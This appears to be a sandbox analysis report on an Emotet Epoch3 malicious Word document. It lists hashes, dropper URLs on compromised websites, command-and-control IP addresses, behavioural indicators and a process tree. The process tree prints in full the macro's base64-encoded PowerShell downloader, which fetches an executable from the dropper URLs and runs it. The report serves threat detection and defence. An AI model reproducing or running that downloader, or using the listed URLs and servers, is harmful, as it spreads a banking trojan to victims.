emotet | 683573224327e8cecc5d38f690c4598f52ece7bd878b05e7f279111680604d5b

General

Target

emotet_e3_683573224327e8cecc5d38f690c4598f52ece7bd878b05e7f279111680604d5b_2020-10-29__161255577856._doc.doc
Size

227KB
MD5

9302cda391554ab9cd2a2012057bbd93
SHA1

73a9ace74211841912ee09399de898b221e47bf3
SHA256

683573224327e8cecc5d38f690c4598f52ece7bd878b05e7f279111680604d5b
SHA512

3496a3261ddccd2ebc8c6b4c4451a9adcac348d38112a1fda76ec1c6886ecc0ab92eefbb8db78be5a03463de4b596182adeeaa21e62a0f82348df5e90df8057a

Score

10^/10

emotet epoch3 banker trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://enjoymylifecheryl.com/wp-includes/FPNxoUiCz3/

exe.dropper

https://homewatchamelia.com/wp-admin/qmK/

exe.dropper

https://seramporemunicipality.org/replacement-vin/Ql4R/

exe.dropper

https://imperfectdream.com/wp-content/xb2csjPW6/

exe.dropper

https://mayxaycafe.net/wp-includes/UxdWFzYQj/

exe.dropper

https://420extracts.ca/cgi-bin/Ecv/

exe.dropper

https://casinopalacett.com/wp-admin/voZDArg/

Extracted

Family

emotet

Botnet

Epoch3

C2

152.32.75.74:443

91.121.200.35:8080

159.203.16.11:8080

188.226.165.170:8080

139.59.61.215:443

78.90.78.210:80

179.5.118.12:80

202.29.237.113:8080

5.79.70.250:8080

185.80.172.199:80

47.154.85.229:80

198.20.228.9:8080

85.246.78.192:80

190.212.140.6:80

181.59.59.54:80

115.79.59.157:80

54.38.143.245:8080

42.200.96.63:80

5.12.246.155:80

74.208.173.91:8080

rsa_pubkey.plain

Signatures

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

POwersheLL.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 540 2564 POwersheLL.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	540	2564	POwersheLL.exe

Emotet Payload 4 IoCs

Detects Emotet payload in memory.

Processes:

resource	yara_rule
behavioral1/memory/3852-12-0x0000000000510000-0x0000000000522000-memory.dmp	emotet
behavioral1/memory/3852-13-0x00000000021F0000-0x0000000002200000-memory.dmp	emotet
behavioral1/memory/3952-16-0x0000000000490000-0x00000000004A2000-memory.dmp	emotet
behavioral1/memory/3952-17-0x0000000000500000-0x0000000000510000-memory.dmp	emotet

Blacklisted process makes network request 4 IoCs

Processes:

POwersheLL.exe

flow pid process

12 540 POwersheLL.exe
14 540 POwersheLL.exe
16 540 POwersheLL.exe
20 540 POwersheLL.exe
Executes dropped EXE 2 IoCs

Processes:

Epl6_wa2m.exepnrpnsp.exe

pid process

3852 Epl6_wa2m.exe
3952 pnrpnsp.exe
Drops file in System32 directory 1 IoCs

Processes:

Epl6_wa2m.exe

description ioc process

File opened for modification C:\Windows\SysWOW64\D3D12\pnrpnsp.exe Epl6_wa2m.exe

flow	pid	process
12	540	POwersheLL.exe
14	540	POwersheLL.exe
16	540	POwersheLL.exe
20	540	POwersheLL.exe

pid	process
3852	Epl6_wa2m.exe
3952	pnrpnsp.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\D3D12\pnrpnsp.exe	Epl6_wa2m.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Modifies data under HKEY_USERS 1 IoCs

Processes:

svchost.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\NGC\SoftLockoutVolatileKey svchost.exe
Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

1084 WINWORD.EXE
1084 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

POwersheLL.exepnrpnsp.exe

pid process

540 POwersheLL.exe
540 POwersheLL.exe
540 POwersheLL.exe
3952 pnrpnsp.exe
3952 pnrpnsp.exe
3952 pnrpnsp.exe
3952 pnrpnsp.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

POwersheLL.exe

description pid process

Token: SeDebugPrivilege 540 POwersheLL.exe
Suspicious use of SetWindowsHookEx 9 IoCs

Processes:

WINWORD.EXEEpl6_wa2m.exepnrpnsp.exe

pid process

1084 WINWORD.EXE
1084 WINWORD.EXE
1084 WINWORD.EXE
1084 WINWORD.EXE
1084 WINWORD.EXE
1084 WINWORD.EXE
1084 WINWORD.EXE
3852 Epl6_wa2m.exe
3952 pnrpnsp.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\NGC\SoftLockoutVolatileKey	svchost.exe

pid	process
1084	WINWORD.EXE
1084	WINWORD.EXE

pid	process
540	POwersheLL.exe
540	POwersheLL.exe
540	POwersheLL.exe
3952	pnrpnsp.exe
3952	pnrpnsp.exe
3952	pnrpnsp.exe
3952	pnrpnsp.exe

description	pid	process
Token: SeDebugPrivilege	540	POwersheLL.exe

pid	process
1084	WINWORD.EXE
1084	WINWORD.EXE
1084	WINWORD.EXE
1084	WINWORD.EXE
1084	WINWORD.EXE
1084	WINWORD.EXE
1084	WINWORD.EXE
3852	Epl6_wa2m.exe
3952	pnrpnsp.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

Epl6_wa2m.exe

description	pid	process	target process
PID 3852 wrote to memory of 3952	3852	Epl6_wa2m.exe	pnrpnsp.exe
PID 3852 wrote to memory of 3952	3852	Epl6_wa2m.exe	pnrpnsp.exe
PID 3852 wrote to memory of 3952	3852	Epl6_wa2m.exe	pnrpnsp.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e3_683573224327e8cecc5d38f690c4598f52ece7bd878b05e7f279111680604d5b_2020-10-29__161255577856._doc.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1084

C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
POwersheLL -ENCOD IAAgACQAOABQADQAdgBjAHUAIAA9ACAAIABbAHQAeQBQAGUAXQAoACIAewA1AH0AewAyAH0AewAwAH0AewAzAH0AewAxAH0AewA0AH0AIgAgAC0AZgAgACcATQAuAGkAJwAsACcATwAnACwAJwB5AHMAdABlACcALAAnAE8ALgBkAEkAcgBlAGMAdAAnACwAJwBSAHkAJwAsACcAUwAnACkAIAAgADsAIAAgAFMAZQBUACAATABzAFYAMAAgACgAWwB0AFkAcABlAF0AKAAiAHsANQB9AHsAMAB9AHsAMwB9AHsAMQB9AHsAMgB9AHsANAB9AHsANgB9ACIAIAAtAEYAJwAuAE4ARQAnACwAJwBWACcALAAnAEkAYwBFAHAAJwAsACcAVAAuAFMAZQBSACcALAAnAG8ASQBuAFQAbQBBAG4AQQBHACcALAAnAHMAWQBTAFQAZQBNACcALAAnAGUAcgAnACkAIAAgACkAIAA7ACAAIAAkAFIAbAByAGsAagBuAHcAPQAoACcAUQByACcAKwAoACcAMQByAHUAJwArACcAOQB5ACcAKQApADsAJABEADcAcQB6ADMAMgBiAD0AJABXAGEANgByAGUAYQA0ACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABEAGUAaAB2ADYANwAzADsAJABPADUAYQBxAGsAMwBnAD0AKAAnAFgAJwArACcAYQA3ACcAKwAoACcAcQAzAGgAJwArACcAMAAnACkAKQA7ACAAKABkAEkAcgAgACgAJwBWAEEAUgBpAEEAYgBsAGUAOgA4ACcAKwAnAFAANAAnACsAJwBWACcAKwAnAGMAdQAnACkAKQAuAHYAYQBsAHUARQA6ADoAIgBjAHIAZQBgAEEAVABlAEQAYABJAFIAZQBDAFQAYABvAFIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AcwBjACcAKwAoACcAcwAnACsAJwA4AHIAJwApACsAJwB5AHsAMAB9ACcAKwAoACcAUwA5AHQAJwArACcANABnAF8AJwApACsAJwBsACcAKwAnAHsAJwArACcAMAB9ACcAKQAgAC0ARgAgAFsAQwBIAEEAcgBdADkAMgApACkAOwAkAEcAYQA4AGYAZgA1AHMAPQAoACgAJwBOAGYAZgAnACsAJwBlAGYAYgAnACkAKwAnAGcAJwApADsAIAAgACQAbABTAHYAMAA6ADoAIgBzAEUAYABjAFUAYABSAGkAdABgAHkAUAByAG8AVABvAEMATwBsACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABSAHUAOAAxADgAaQBpAD0AKAAoACcAVgAnACsAJwB6AHYAZABlAG4AJwApACsAJwB2ACcAKQA7ACQARwA5AHAAbwBfAGcAdAAgAD0AIAAoACcARQBwACcAKwAnAGwAJwArACgAJwA2AF8AdwBhADIAJwArACcAbQAnACkAKQA7ACQAWQBmAHcAYgBhADYANgA9ACgAKAAnAFQAaAAnACsAJwBsACcAKQArACcAaQAnACsAKAAnADcAJwArACcAYgAzACcAKQApADsAJABJAHIAaQBvAHUAZgB1AD0AKAAoACcAWQAyACcAKwAnADIAJwApACsAJwBsACcAKwAoACcAMwAnACsAJwBjAHQAJwApACkAOwAkAEwAbABvADYAbgBfAHcAPQAkAEgATwBNAEUAKwAoACgAJwB7ACcAKwAnADAAfQBOAHMAJwArACcAYwBzADgAcgB5AHsAMAAnACsAJwB9AFMAJwArACcAOQAnACsAJwB0ADQAZwBfAGwAewAwAH0AJwApACAALQBGACAAWwBDAGgAQQBSAF0AOQAyACkAKwAkAEcAOQBwAG8AXwBnAHQAKwAoACcALgAnACsAKAAnAGUAJwArACcAeABlACcAKQApADsAJABKAHYAagBkAHMANAB5AD0AKAAoACcARwBfAHcAbgAnACsAJwB4ACcAKQArACcAOQB1ACcAKQA7ACQASAA1AHgAcgA1AGwAbQA9AC4AKAAnAG4AJwArACcAZQB3AC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAAbgBFAHQALgB3AGUAYgBjAEwASQBFAE4AdAA7ACQATQBtAG8ANAAxAHYAbgA9ACgAKAAoACgAJwBoACcAKwAnAHQAdAAnACsAJwBwAHMAOgBdAFsAIAAxACkAIABqAGoAawAnACsAJwBnACcAKwAnAFMAIAAnACkAKQArACcAWwAnACsAKAAnAF0AIAAnACsAJwBbAF0AJwApACsAKAAoACcAdwBdAFsAIAAnACsAJwAxACkAIAAnACkAKQArACgAJwBqAGoAawAnACsAJwBnACcAKQArACgAJwBTACcAKwAnACAAWwBdACcAKQArACgAJwAgAFsAXQAnACsAJwB3ACcAKQArACgAJwBlAG4AagAnACsAJwBvAHkAbQAnACkAKwAnAHkAbAAnACsAJwBpACcAKwAoACcAZgAnACsAJwBlAGMAaABlAHIAeQAnACkAKwAoACcAbAAuACcAKwAnAGMAJwApACsAKAAnAG8AJwArACcAbQBdACcAKQArACcAWwAnACsAJwAgACcAKwAoACgAJwAxACkAIAAnACsAJwBqACcAKQApACsAJwBqACcAKwAnAGsAZwAnACsAKAAoACcAUwAnACsAJwAgAFsAXQAnACsAJwAgAFsAXQB3ACcAKwAnAHcAcAAtAGkAbgBjAGwAdQBkACcAKwAnAGUAcwBdACcAKwAnAFsAIAAxACkAIABqAGoAJwArACcAawBnAFMAJwArACcAIAAnACkAKQArACcAWwAnACsAKAAnAF0AJwArACcAIABbACcAKQArACgAJwBdAHcAJwArACcARgBQACcAKwAnAE4AeABvAFUAaQAnACkAKwAnAEMAJwArACcAegAnACsAJwAzACcAKwAnAF0AJwArACcAWwAgACcAKwAoACgAJwAxACkAJwArACcAIABqACcAKwAnAGoAawAnACkAKQArACgAJwBnACcAKwAnAFMAIAAnACsAJwBbAF0AIABbACcAKQArACcAXQAnACsAJwB3ACcAKwAnAEAAJwArACcAaAB0ACcAKwAoACcAdABwACcAKwAnAHMAJwApACsAJwA6ACcAKwAoACcAXQBbACcAKwAnACAAMQAnACkAKwAoACgAJwApACcAKwAnACAAagAnACkAKQArACgAJwBqAGsAJwArACcAZwBTACAAJwApACsAJwBbAF0AJwArACgAJwAgAFsAJwArACcAXQB3AF0AJwApACsAKAAnAFsAJwArACcAIAAxACcAKQArACgAKAAnACkAIABqACcAKwAnAGoAawAnACkAKQArACcAZwAnACsAKAAnAFMAIAAnACsAJwBbACcAKwAnAF0AIABbAF0AJwArACcAdwBoACcAKQArACcAbwBtACcAKwAoACcAZQAnACsAJwB3AGEAdABjACcAKwAnAGgAYQBtACcAKQArACgAJwBlAGwAaQAnACsAJwBhAC4AJwApACsAJwBjAG8AJwArACgAJwBtAF0AJwArACcAWwAgADEAJwApACsAKAAoACcAKQAgACcAKwAnAGoAagBrAGcAJwApACkAKwAnAFMAJwArACgAJwAgACcAKwAnAFsAXQAgAFsAXQB3AHcAJwArACcAcAAtACcAKQArACcAYQAnACsAJwBkAG0AJwArACcAaQAnACsAKAAnAG4AJwArACcAXQBbACcAKQArACgAKAAnACAAMQApACcAKwAnACAAagBqAGsAJwArACcAZwBTACAAWwAnACkAKQArACgAJwBdACAAWwBdACcAKwAnAHcAJwArACcAcQAnACkAKwAnAG0AJwArACgAJwBLAF0AJwArACcAWwAgACcAKQArACgAKAAnADEAKQAnACsAJwAgAGoAagBrAGcAJwArACcAUwAnACsAJwAgACcAKQApACsAJwBbAF0AJwArACgAJwAgAFsAXQAnACsAJwB3AEAAaAB0ACcAKQArACgAKAAnAHQAcABzADoAXQBbACAAMQAnACsAJwApACcAKwAnACAAJwApACkAKwAoACcAagBqACcAKwAnAGsAJwApACsAKAAnAGcAJwArACcAUwAgACcAKQArACgAJwBbAF0AIAAnACsAJwBbACcAKQArACcAXQAnACsAJwB3AF0AJwArACgAJwBbACcAKwAnACAAMQAnACkAKwAoACgAJwApACAAJwApACkAKwAoACcAagBqAGsAZwAnACsAJwBTACAAWwAnACkAKwAoACcAXQAgAFsAXQAnACsAJwB3AHMAZQAnACkAKwAnAHIAYQAnACsAKAAnAG0AcABvACcAKwAnAHIAJwApACsAJwBlACcAKwAnAG0AJwArACgAJwB1ACcAKwAnAG4AaQBjAGkAcAAnACsAJwBhAGwAJwApACsAKAAnAGkAJwArACcAdAB5AC4AJwApACsAKAAnAG8AcgBnAF0AJwArACcAWwAgACcAKQArACcAMQAnACsAKAAoACcAKQAnACsAJwAgAGoAagBrAGcAJwApACkAKwAoACcAUwAgACcAKwAnAFsAXQAgAFsAJwApACsAKAAnAF0AJwArACcAdwAnACsAJwByAGUAcABsAGEAJwApACsAJwBjACcAKwAnAGUAbQAnACsAKAAnAGUAJwArACcAbgB0AC0AdgBpAG4AXQAnACkAKwAnAFsAIAAnACsAKAAoACcAMQAnACsAJwApACAAagBqACcAKQApACsAKAAnAGsAZwAnACsAJwBTACcAKQArACgAJwAgACcAKwAnAFsAXQAnACkAKwAnACAAWwAnACsAJwBdACcAKwAoACcAdwAnACsAJwBRAGwANABSAF0AJwArACcAWwAgACcAKQArACgAKAAnADEAKQAnACsAJwAgAGoAagAnACkAKQArACcAawAnACsAJwBnACcAKwAoACcAUwAgACcAKwAnAFsAXQAgACcAKQArACgAJwBbACcAKwAnAF0AdwBAACcAKQArACcAaAAnACsAJwB0ACcAKwAoACcAdABwAHMAOgBdACcAKwAnAFsAJwApACsAKAAoACcAIAAxACkAIABqAGoAJwArACcAawAnACsAJwBnAFMAIABbACcAKwAnAF0AIABbACcAKQApACsAKAAoACcAXQAnACsAJwB3AF0AWwAnACsAJwAgADEAKQAgACcAKwAnAGoAagBrACcAKwAnAGcAUwAnACsAJwAgAFsAXQAgAFsAJwApACkAKwAoACcAXQB3AGkAbQAnACsAJwBwACcAKwAnAGUAJwApACsAKAAnAHIAZgBlAGMAJwArACcAdABkACcAKQArACgAJwByAGUAYQAnACsAJwBtAC4AYwAnACkAKwAoACgAJwBvAG0AXQBbACAAJwArACcAMQApACAAagBqAGsAJwArACcAZwBTACAAWwAnACsAJwBdACAAWwAnACkAKQArACcAXQAnACsAKAAnAHcAdwAnACsAJwBwAC0AJwApACsAKAAnAGMAbwAnACsAJwBuAHQAZQAnACsAJwBuAHQAXQAnACkAKwAnAFsAJwArACcAIAAnACsAKAAoACcAMQApACcAKwAnACAAagBqACcAKQApACsAKAAnAGsAZwAnACsAJwBTACAAWwBdACcAKQArACgAJwAgAFsAXQB3ACcAKwAnAHgAJwApACsAKAAnAGIAMgAnACsAJwBjACcAKQArACcAcwBqACcAKwAoACcAUAAnACsAJwBXADYAJwApACsAJwBdAFsAJwArACgAKAAnACAAMQApACAAJwArACcAagBqACcAKQApACsAJwBrAGcAJwArACgAJwBTACAAWwAnACsAJwBdACAAJwApACsAKAAnAFsAXQAnACsAJwB3AEAAaAB0ACcAKwAnAHQAcAAnACkAKwAnAHMAOgAnACsAKAAnAF0AJwArACcAWwAgADEAJwApACsAJwApACcAKwAoACcAIABqACcAKwAnAGoAawBnACcAKQArACcAUwAgACcAKwAoACcAWwBdACAAJwArACcAWwBdACcAKQArACgAJwB3AF0AJwArACcAWwAnACkAKwAoACgAJwAgADEAJwArACcAKQAgAGoAagAnACsAJwBrAGcAJwApACkAKwAnAFMAIAAnACsAJwBbAF0AJwArACcAIABbACcAKwAoACcAXQAnACsAJwB3AG0AYQAnACkAKwAoACcAeQB4AGEAJwArACcAeQBjACcAKQArACgAKAAnAGEAZgBlAC4AbgAnACsAJwBlAHQAXQBbACcAKwAnACAAMQApACAAJwArACcAagAnACkAKQArACcAagAnACsAKAAnAGsAJwArACcAZwBTACcAKQArACgAJwAgAFsAXQAnACsAJwAgACcAKQArACgAJwBbAF0AdwB3ACcAKwAnAHAALQBpAG4AYwBsAHUAJwArACcAZABlACcAKQArACgAKAAnAHMAXQAnACsAJwBbACAAMQApACAAagBqACcAKwAnAGsAJwApACkAKwAoACcAZwBTACAAJwArACcAWwAnACkAKwAoACcAXQAgAFsAJwArACcAXQB3AFUAJwApACsAKAAnAHgAJwArACcAZABXAEYAJwApACsAKAAnAHoAJwArACcAWQBRACcAKQArACgAJwBqAF0AJwArACcAWwAnACkAKwAoACgAJwAgADEAKQAgACcAKwAnAGoAJwApACkAKwAoACcAagBrAGcAJwArACcAUwAgAFsAXQAgACcAKwAnAFsAXQAnACkAKwAnAHcAQAAnACsAJwBoACcAKwAnAHQAdAAnACsAJwBwACcAKwAoACcAcwAnACsAJwA6AF0AJwApACsAKAAoACcAWwAnACsAJwAgADEAKQAgAGoAJwApACkAKwAoACcAagAnACsAJwBrAGcAJwApACsAKAAnAFMAIABbACcAKwAnAF0AJwApACsAKAAnACAAWwAnACsAJwBdAHcAXQAnACkAKwAoACgAJwBbACAAMQApACAAJwArACcAagAnACkAKQArACcAagAnACsAJwBrACcAKwAoACcAZwBTACAAWwAnACsAJwBdACcAKwAnACAAWwBdACcAKwAnAHcANAAyADAAJwArACcAZQB4AHQAcgBhACcAKQArACgAJwBjACcAKwAnAHQAcwAnACkAKwAoACgAJwAuAGMAYQAnACsAJwBdAFsAJwArACcAIAAxACkAIAAnACkAKQArACgAJwBqAGoAawAnACsAJwBnACcAKQArACgAJwBTACAAWwBdACAAJwArACcAWwBdAHcAYwAnACsAJwBnACcAKQArACgAJwBpACcAKwAnAC0AYgBpACcAKQArACgAKAAnAG4AXQBbACcAKwAnACAAJwArACcAMQApACcAKQApACsAJwAgAGoAJwArACcAagBrACcAKwAnAGcAJwArACgAJwBTACAAJwArACcAWwBdACAAWwBdACcAKwAnAHcAJwApACsAKAAoACcARQBjAHYAXQBbACAAJwArACcAMQApACcAKQApACsAKAAnACAAJwArACcAagBqACcAKwAnAGsAZwBTACAAJwApACsAKAAnAFsAXQAgAFsAJwArACcAXQAnACsAJwB3ACcAKQArACgAJwBAAGgAdAB0AHAAcwAnACsAJwA6AF0AJwApACsAJwBbACAAJwArACgAKAAnADEAKQAgAGoAagAnACsAJwBrAGcAUwAnACkAKQArACcAIAAnACsAJwBbAF0AJwArACgAJwAgACcAKwAnAFsAXQB3AF0AJwApACsAJwBbACcAKwAnACAAJwArACgAKAAnADEAKQAgAGoAagAnACsAJwBrACcAKQApACsAKAAnAGcAUwAgACcAKwAnAFsAXQAgAFsAJwArACcAXQB3ACcAKQArACgAJwBjAGEAJwArACcAcwAnACkAKwAoACcAaQBuACcAKwAnAG8AcAAnACkAKwAoACcAYQBsACcAKwAnAGEAJwApACsAJwBjAGUAJwArACgAJwB0AHQALgAnACsAJwBjAG8AbQBdAFsAJwApACsAJwAgACcAKwAnADEAJwArACgAKAAnACkAJwArACcAIABqACcAKQApACsAJwBqACcAKwAoACcAawBnACcAKwAnAFMAIABbAF0AJwApACsAKAAnACAAWwBdACcAKwAnAHcAdwAnACkAKwAoACcAcAAtACcAKwAnAGEAZAAnACsAJwBtAGkAJwApACsAJwBuACcAKwAoACgAJwBdAFsAJwArACcAIAAxACkAIABqACcAKwAnAGoAJwApACkAKwAoACcAawBnAFMAJwArACcAIABbACcAKQArACgAJwBdACAAJwArACcAWwBdAHcAJwApACsAJwB2ACcAKwAnAG8AJwArACcAWgBEACcAKwAnAEEAJwArACgAKAAnAHIAJwArACcAZwBdAFsAIAAnACsAJwAxACkAIAAnACkAKQArACgAJwBqAGoAJwArACcAawAnACkAKwAnAGcAJwArACgAJwBTACAAJwArACcAWwAnACkAKwAoACcAXQAgACcAKwAnAFsAJwApACsAJwBdACcAKwAnAHcAJwApACkALgAiAHIAYABFAFAAYABMAGEAYwBlACIAKAAoACgAKAAnAF0AWwAnACsAJwAgADEAJwApACsAKAAoACcAKQAgAGoAJwArACcAagBrAGcAUwAnACsAJwAgAFsAJwApACkAKwAnAF0AIAAnACsAJwBbAF0AJwArACcAdwAnACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcALwAnACkALAAoACcAeAB3ACcAKwAnAGUAJwApACkAWwAwAF0AKQAuACIAcwBQAGwAYABJAHQAIgAoACQAQwBoAGsAdQB0ADkANAAgACsAIAAkAEQANwBxAHoAMwAyAGIAIAArACAAJABPAHAAZABrAGUAdABuACkAOwAkAFIAZgA3AGsAMwB6AGsAPQAoACcAVQAnACsAJwBzACcAKwAoACcAZgAnACsAJwB1AHQAaAB2ACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABVAGgAYgBrAGQANwBrACAAaQBuACAAJABNAG0AbwA0ADEAdgBuACkAewB0AHIAeQB7ACQASAA1AHgAcgA1AGwAbQAuACIAZABPAGAAdwBuAGwAYABPAGEAYABEAGYASQBsAEUAIgAoACQAVQBoAGIAawBkADcAawAsACAAJABMAGwAbwA2AG4AXwB3ACkAOwAkAEYAcwBpAHUANABfAHgAPQAoACgAJwBVACcAKwAnAHIAdAAnACkAKwAoACcAZAB6AG8AJwArACcAeAAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABMAGwAbwA2AG4AXwB3ACkALgAiAEwAZQBuAGAARwBUAGgAIgAgAC0AZwBlACAANAA0ADIANgAzACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAoACcAdwAnACsAKAAnAGkAJwArACcAbgAzADIAJwApACsAKAAnAF8AUAAnACsAJwByACcAKwAnAG8AYwBlAHMAcwAnACkAKQApAC4AIgBDAHIAZQBgAEEAYABUAGUAIgAoACQATABsAG8ANgBuAF8AdwApADsAJABZAHoAcgBjAGoAcgBvAD0AKAAoACcAVAAyACcAKwAnAGEANAAnACkAKwAnAGkAJwArACcAagBuACcAKQA7AGIAcgBlAGEAawA7ACQAQwBjAHcAawA1ADcAegA9ACgAJwBMAHMAJwArACgAJwBsAGYAaAA2ACcAKwAnAHAAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEwAOQB3AHQAZAAwADAAPQAoACgAJwBWACcAKwAnAHgAYgBpACcAKQArACcAdwAnACsAJwB4AHUAJwApAA==
1⤵
- Process spawned unexpected child process
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:540

C:\Users\Admin\Nscs8ry\S9t4g_l\Epl6_wa2m.exe
C:\Users\Admin\Nscs8ry\S9t4g_l\Epl6_wa2m.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3852

C:\Windows\SysWOW64\D3D12\pnrpnsp.exe
"C:\Windows\SysWOW64\D3D12\pnrpnsp.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3952

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NgcSvc
1⤵
PID:3680

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s DeviceAssociationService
1⤵
PID:192

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s NgcCtnrSvc
1⤵
- Modifies data under HKEY_USERS
PID:684

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\Nscs8ry\S9t4g_l\Epl6_wa2m.exe
MD5
77939d1dbf57fb7b4c79d36f45e46080

SHA1
1d276443f0382b6a6c65cf84624b7bb37c2e1304

SHA256
b719f832779494f20eddd4be65384d4c2a026d0ed401057f1563dd9847ab93ba

SHA512
63e13a56f9b9377f49a1fb856fea5ec3915fedc4bb3c4eb1945293c7ae79a7c097d9822185fbb7432573383e84c984e94caf857fbf7987f02d0f0e9c4ae0eb13

Download Submit
C:\Users\Admin\Nscs8ry\S9t4g_l\Epl6_wa2m.exe
MD5
77939d1dbf57fb7b4c79d36f45e46080

SHA1
1d276443f0382b6a6c65cf84624b7bb37c2e1304

SHA256
b719f832779494f20eddd4be65384d4c2a026d0ed401057f1563dd9847ab93ba

SHA512
63e13a56f9b9377f49a1fb856fea5ec3915fedc4bb3c4eb1945293c7ae79a7c097d9822185fbb7432573383e84c984e94caf857fbf7987f02d0f0e9c4ae0eb13

Download Submit
C:\Windows\SysWOW64\D3D12\pnrpnsp.exe
MD5
77939d1dbf57fb7b4c79d36f45e46080

SHA1
1d276443f0382b6a6c65cf84624b7bb37c2e1304

SHA256
b719f832779494f20eddd4be65384d4c2a026d0ed401057f1563dd9847ab93ba

SHA512
63e13a56f9b9377f49a1fb856fea5ec3915fedc4bb3c4eb1945293c7ae79a7c097d9822185fbb7432573383e84c984e94caf857fbf7987f02d0f0e9c4ae0eb13

Download Submit
memory/540-8-0x00000199DB6A0000-0x00000199DB6A1000-memory.dmp

Filesize
4KB

Download
memory/540-9-0x00000199DBA00000-0x00000199DBA01000-memory.dmp

Filesize
4KB

Download
memory/540-7-0x00007FFE61390000-0x00007FFE61D7C000-memory.dmp

Filesize
9.9MB

Download
memory/1084-0-0x000002C0AED40000-0x000002C0AF377000-memory.dmp

Filesize
6.2MB

Download
memory/1084-5-0x000002C0B7AF0000-0x000002C0B7AF5000-memory.dmp

Filesize
20KB

Download
memory/3852-12-0x0000000000510000-0x0000000000522000-memory.dmp

Filesize
72KB

Download
memory/3852-13-0x00000000021F0000-0x0000000002200000-memory.dmp

Filesize
64KB

Download
memory/3952-14-0x0000000000000000-mapping.dmp

Download
memory/3952-16-0x0000000000490000-0x00000000004A2000-memory.dmp

Filesize
72KB

Download
memory/3952-17-0x0000000000500000-0x0000000000510000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads